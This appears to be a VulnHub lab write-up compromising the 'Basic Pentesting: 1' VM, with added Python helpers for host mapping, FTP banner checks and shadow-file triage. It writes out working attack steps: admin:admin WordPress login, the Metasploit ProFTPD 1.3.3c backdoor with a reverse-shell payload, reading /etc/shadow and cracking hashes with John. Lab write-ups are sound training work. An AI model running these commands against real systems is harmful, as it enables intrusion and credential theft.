Introduction
This write-up covers the exploitation of the Basic Pentesting: 1 machine from VulnHub. The goal was to assess how easily the system could be compromised using common penetration testing techniques. Result: Full system compromise was achieved through an exposed WordPress installation with weak credentials and an outdated ProFTPD service containing a known backdoor.
Link to the VulnHub machine: https://drive.google.com/file/d/1wkfI9cpyjouj6ox_88EqF6tKMtTHIYC1/view?usp=sharing

Vulnerability 1: Improper Virtual Host Configuration & Weak WordPress Credentials
Description: The web server exposes a hidden WordPress installation under /secret whose absolute URLs point at a virtual host name (vtcsec) that is not published in DNS, and the WordPress admin account uses the weak, guessable credentials admin:admin. Together these let an attacker find the site and gain full administrative access to it.
Exploitation POC:
Step 1. Identify the web server
- Run an ARP scan of the local network to find the target machine's IP
sudo arp-scan -l
- Scan the IP with nmap (default scripts, service/version detection, no host discovery)
nmap -sC -sV -Pn 192.168.64.2
- Visit http://192.168.64.2; only the Apache default page "It works!" appears

Step 2. Discover the Hidden WordPress Directory
- Perform directory enumeration using gobuster
gobuster dir -u http://192.168.64.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- Gobuster reveals the path /secret; a broken WordPress interface (no styling, dead links) loads when it is visited

Step 3. Identify the Virtual Host Misconfiguration and Fix the Mapping
- Inspect the page source and its links: stylesheets, scripts and links all point to http://vtcsec/secret
- The name vtcsec does not resolve from the attacking machine, so the browser cannot fetch those resources and the UI breaks
- Map the name to the target IP manually in /etc/hosts
echo "192.168.64.2 vtcsec" | sudo tee -a /etc/hosts
- Refresh the page (or browse to http://vtcsec/secret): the full WordPress UI now loads correctly

Step 4. Enumerate WordPress Users
- Run WPScan to enumerate users
wpscan --url http://192.168.64.2/secret/ --enumerate u
- WPScan identifies the username: admin

Step 5. Exploit Weak Credentials
- Go to the WordPress login page (http://vtcsec/secret/wp-login.php)
- Attempt the weak credentials admin:admin
- Login succeeds, granting full administrative control and access to the WordPress dashboard
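The diagnosis in Step 3 can be automated: pull every hostname the page's absolute URLs depend on, check which of them the attacking box cannot resolve, and emit the /etc/hosts line that fixes it. The script below is an added example, not part of the original write-up; the HTML it parses is a constructed stand-in for the /secret page (not captured output), and the resolver hook exists so the check also runs offline.

```python
"""Diagnose the broken virtual-host mapping from Step 3 (Vulnerability 1).

Added example; not part of the original write-up. Given the HTML of the
/secret page and the IP we browsed to, it lists every hostname the page's
absolute URLs depend on, reports the ones the attacking machine cannot
resolve, and prints the /etc/hosts line that repairs the mapping.
"""
import socket
from html.parser import HTMLParser
from urllib.parse import urlparse

TARGET_IP = "192.168.64.2"

# Constructed sample, not captured from the VM: WordPress builds absolute
# URLs from its configured site URL (http://vtcsec/secret), which is why the
# UI breaks when the site is browsed by IP.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css">
<script src="http://vtcsec/secret/wp-includes/js/jquery/jquery.js"></script>
</head><body>
<a href="http://vtcsec/secret/wp-login.php">Log in</a>
<a href="http://192.168.64.2/secret/?p=1">Hello world!</a>
<a href="/secret/feed/">Feed</a>
<a href="https://wordpress.org/">Powered by WordPress</a>
</body></html>"""


class LinkCollector(HTMLParser):
    """Gathers every href/src/action attribute value in the document."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src", "action") and value:
                self.urls.append(value)


def referenced_hosts(html):
    """Hostnames used by absolute URLs on the page (relative links have none)."""
    collector = LinkCollector()
    collector.feed(html)
    hosts = set()
    for url in collector.urls:
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def offline_resolver(known):
    """Resolver stand-in for offline runs: succeeds only for names in `known`."""
    def resolve(host):
        if host in known:
            return "0.0.0.0"
        raise socket.gaierror(f"cannot resolve {host}")
    return resolve


def unresolvable_hosts(html, resolver=socket.gethostbyname):
    """Hostnames the page depends on that the given resolver cannot map."""
    missing = set()
    for host in referenced_hosts(html):
        try:
            resolver(host)
        except OSError:  # socket.gaierror is a subclass of OSError
            missing.add(host)
    return missing


def hosts_entries(target_ip, hosts):
    """Lines to append to /etc/hosts so the page renders against target_ip."""
    return [f"{target_ip} {host}" for host in sorted(hosts)]


if __name__ == "__main__":
    missing = unresolvable_hosts(SAMPLE_HTML)
    print("hosts the page needs but we cannot resolve:", missing or "none")
    for line in hosts_entries(TARGET_IP, missing):
        print("add to /etc/hosts:", line)
```

On a real engagement, feed it the body returned by `curl http://192.168.64.2/secret/` and keep the default resolver; the only name it should report for this VM is vtcsec, and the wordpress.org link is there to show that externally resolvable hosts are not flagged.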

Vulnerability 2: ProFTPD 1.3.3c Backdoor Remote Command Execution
Description: The FTP service is running ProFTPD 1.3.3c. In late 2010 the project's distribution server was compromised and a backdoor was inserted into the 1.3.3c source tarball; a server built from that tarball allows unauthenticated remote command execution as root.
Exploitation POC:
Step 1. Identify the Vulnerable FTP Service
- The nmap scan from Vulnerability 1 shows an FTP service identified as ProFTPD 1.3.3c, the version publicly known to have shipped with a backdoor in its source code.
Step 2. Search for Public Exploits
- Check available exploits using searchsploit
searchsploit proftpd 1.3.3c
- Results show an exploit for ProFTPD 1.3.3c Backdoor Command Execution, including a Metasploit module.
Step 3. Load the Exploit in Metasploit
- Start Metasploit
msfconsole
- Load the exploit module
use exploit/unix/ftp/proftpd_133c_backdoor
- Set the target IP
set RHOSTS 192.168.64.2
- List the compatible payloads and pick a reverse command shell
show payloads
set PAYLOAD cmd/unix/reverse
- Set the listener address (the attacking machine's IP) and run the exploit
set LHOST 192.168.64.4
exploit

Step 4. Gain a Root Command Shell
- Metasploit reports:
Command shell session opened
- This session provides direct command execution as root, with no credentials supplied at any point.
Step 5. Verify Root Privileges
- Confirm the user and its IDs from the session:
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
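A banner check is enough to spot this service during recon without touching the exploit. The script below is an added example, not part of the original write-up and not the Metasploit module's code: it extracts the version ProFTPD advertises in its FTP greeting, flags exactly 1.3.3c, and can read the live greeting over a plain socket. The banners it is run against here are constructed samples, not captures from the VM.

```python
"""Banner check for the trojaned ProFTPD 1.3.3c release (Vulnerability 2).

Added example; not part of the original write-up. It only identifies the
advertised version; confirming the backdoor is left to the Metasploit
module used in the write-up.
"""
import re
import socket

BACKDOORED_VERSION = "1.3.3c"
VERSION_RE = re.compile(r"ProFTPD\s+(\d+\.\d+\.\d+[a-z]?)", re.IGNORECASE)

# Constructed sample greetings (not captured from the VM).
SAMPLE_BANNERS = {
    "vulnerable": "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.64.2]\r\n",
    "patched": "220 ProFTPD 1.3.5e Server (Debian) [::ffff:10.0.0.5]\r\n",
    "other_daemon": "220 (vsFTPd 3.0.3)\r\n",
    "multiline": "220-Welcome to the FTP service.\r\n220 ProFTPD 1.3.3c Server ready.\r\n",
    "hidden": "220 FTP server ready.\r\n",  # ServerIdent off hides the version
}


def proftpd_version(banner):
    """Version string advertised in the greeting, or None if not ProFTPD or hidden."""
    match = VERSION_RE.search(banner)
    return match.group(1) if match else None


def is_backdoor_candidate(banner):
    """True when the banner advertises exactly the 1.3.3c release."""
    return proftpd_version(banner) == BACKDOORED_VERSION


def greeting_complete(data):
    """True once a fully received line starts with '220 ' (end of a 220- block)."""
    lines = data.split(b"\n")[:-1]  # drop the trailing partial/empty fragment
    return any(line.startswith(b"220 ") for line in lines)


def grab_banner(host, port=21, timeout=5.0):
    """Read the FTP greeting from a live host, including 220- continuation lines."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        data = b""
        while not greeting_complete(data):
            chunk = sock.recv(1024)
            if not chunk:
                break
            data += chunk
    return data.decode("utf-8", errors="replace")


if __name__ == "__main__":
    for label, banner in SAMPLE_BANNERS.items():
        print(f"{label:13s} version={proftpd_version(banner)!s:7s} "
              f"candidate={is_backdoor_candidate(banner)}")
```

Two caveats a practitioner should keep in mind. A 1.3.3c banner is a candidate, not proof: the trojaned tarball was only available for a few days, and a package built from clean 1.3.3c source advertises the same version, so the Metasploit session (or its absence) is the real answer. Conversely, `ServerIdent off` removes the version from the greeting, so a bare "FTP server ready" banner does not rule the service out.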
Vulnerability 3: Weak Password Policy allowing privileged account compromise
Description: The system stores user password hashes in /etc/shadow, and once an attacker gains initial root-level access, the hash for user marlinspike can be extracted and cracked using John the Ripper. The cracked password allows the attacker to log in via SSH, gaining persistent authenticated access.
Exploitation POC:
Step 1. Start with Root Access from Vulnerability 2
- Upgrade the raw command shell session to an interactive TTY, for example with Python's pty module:
python -c 'import pty; pty.spawn("/bin/bash")'
Step 2. Locate Password Hashes
- Display the /etc/shadow file (readable only because the session is root)
cat /etc/shadow
- Identify the entry for the target user, marlinspike
- Copy the entire second field of that line, including the $6$ prefix and salt; John needs the whole string, not just the tail

Step 3. Use John the Ripper to crack the password
- Save the entry as user:hash in a file, e.g. pass.txt
- Run John the Ripper against the extracted hash
john pass.txt
- John works through its single, wordlist and incremental modes and eventually outputs the cracked password; john --show pass.txt displays it again later.
Step 4. Verify the Password
- Attempt an SSH login with the cracked credentials
ssh marlinspike@192.168.64.2
- When prompted, enter the cracked password
Step 5. Confirm Authenticated Access
- Once logged in, verify the user identity
whoami
marlinspike
- The same password also works for a console login on the VM.

With these credentials, SSH access to the machine as marlinspike no longer depends on the FTP backdoor and can be used to carry out further tasks.
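Steps 2 and 3 above hide two details that trip people up: which accounts in /etc/shadow are actually worth cracking, and how much of the field to copy. The script below is an added example, not part of the original write-up: it parses shadow entries, separates real hashes from locked and password-less accounts, names the crypt scheme from the $id$ prefix, and produces the user:hash line John expects. The shadow text is a constructed sample, and the hash strings in it are placeholders of the right shape, not real hashes for any account on the VM.

```python
"""Shadow-file triage before handing a hash to John (Vulnerability 3).

Added example; not part of the original write-up. The sample below is
constructed and its hashes are placeholders that will not crack to anything.
"""
FIELDS = ("name", "hash", "lastchange", "min", "max", "warn", "inactive", "expire", "reserved")

# $id$ prefixes from crypt(5) mapped to (scheme, john --format name).
# yescrypt has no native john format; john's crypt(3) wrapper handles it.
SCHEMES = {
    "$1$": ("md5crypt", "md5crypt"),
    "$5$": ("sha256crypt", "sha256crypt"),
    "$6$": ("sha512crypt", "sha512crypt"),
    "$2b$": ("bcrypt", "bcrypt"),
    "$2y$": ("bcrypt", "bcrypt"),
    "$y$": ("yescrypt", "crypt"),
}

# Constructed sample, not the VM's real /etc/shadow.
SAMPLE_SHADOW = """root:*:17539:0:99999:7:::
daemon:*:17539:0:99999:7:::
marlinspike:$6$aBcDeFgH$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijkl:17539:0:99999:7:::
legacy:$1$saltsalt$0123456789abcdefghijkl:17539:0:99999:7:::
guest::17539:0:99999:7:::
sshd:!:17539:0:99999:7:::
"""


def parse_shadow(text):
    """Map user name -> dict of the nine shadow fields; malformed lines are skipped."""
    entries = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != len(FIELDS) or not parts[0]:
            continue
        entries[parts[0]] = dict(zip(FIELDS, parts))
    return entries


def classify(hash_field):
    """'empty' (no password needed), 'locked' (* or ! prefix), or the scheme name."""
    if hash_field == "":
        return "empty"
    if hash_field.startswith(("*", "!")):
        return "locked"
    for prefix, (scheme, _fmt) in SCHEMES.items():
        if hash_field.startswith(prefix):
            return scheme
    return "unknown"


def john_format(hash_field):
    """Value for john's --format option, or None if the field is not a crackable hash."""
    for prefix, (_scheme, fmt) in SCHEMES.items():
        if hash_field.startswith(prefix):
            return fmt
    return None


def crackable_accounts(entries):
    """Users whose field holds a real hash, i.e. the ones worth copying into John."""
    return sorted(u for u, e in entries.items() if john_format(e["hash"]) is not None)


def passwordless_accounts(entries):
    """Users with an empty password field: a login needs no password at all."""
    return sorted(u for u, e in entries.items() if classify(e["hash"]) == "empty")


def john_input_line(entries, user):
    """The user:hash line to save (e.g. as pass.txt) before running john."""
    return f"{user}:{entries[user]['hash']}"


if __name__ == "__main__":
    shadow = parse_shadow(SAMPLE_SHADOW)
    print("password-less accounts:", passwordless_accounts(shadow))
    for user in crackable_accounts(shadow):
        h = shadow[user]["hash"]
        print(f"{user}: {classify(h)} -> john --format={john_format(h)}")
    print(john_input_line(shadow, "marlinspike"))
```

Save the printed line as pass.txt and run `john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt pass.txt`, then `john --show pass.txt`. Note that a field like `!$6$...` is a locked account whose hash is still intact: stripping the leading `!` makes it crackable, and the recovered password may be reused elsewhere, so a locked flag is not a reason to ignore the entry.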
